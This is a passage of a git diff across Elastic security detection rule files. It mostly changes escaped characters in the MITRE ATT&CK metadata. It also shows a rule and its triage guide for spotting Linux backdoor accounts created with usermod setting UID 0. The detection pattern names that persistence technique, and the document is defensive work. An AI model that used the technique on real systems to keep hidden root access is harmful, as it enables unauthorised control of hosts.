"Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json index 46b7765d6ad..acf3add38a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json +++ b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_1.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_1.json index 55ae1d3e313..aed3966065d 100644 --- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_1.json +++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_1.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_2.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_2.json index 13e6840da4d..00f8673e920 100644 --- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_2.json +++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_2.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Backdoor User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.name == \"usermod\" and\nprocess.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n", "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_3.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_3.json index 30667287c1f..d3319b05b51 100644 --- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_3.json +++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_3.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Backdoor User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.name == \"usermod\" and\nprocess.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n", "related_integrations": [ { @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_4.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_4.json index a021bdf8afe..5295724afab 100644 --- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_4.json +++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_4.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Backdoor User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.name == \"usermod\" and\nprocess.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_5.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_5.json index f42293b1abc..18d54b15d6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_5.json +++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_5.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Backdoor User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.name == \"usermod\" and\nprocess.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_104.json 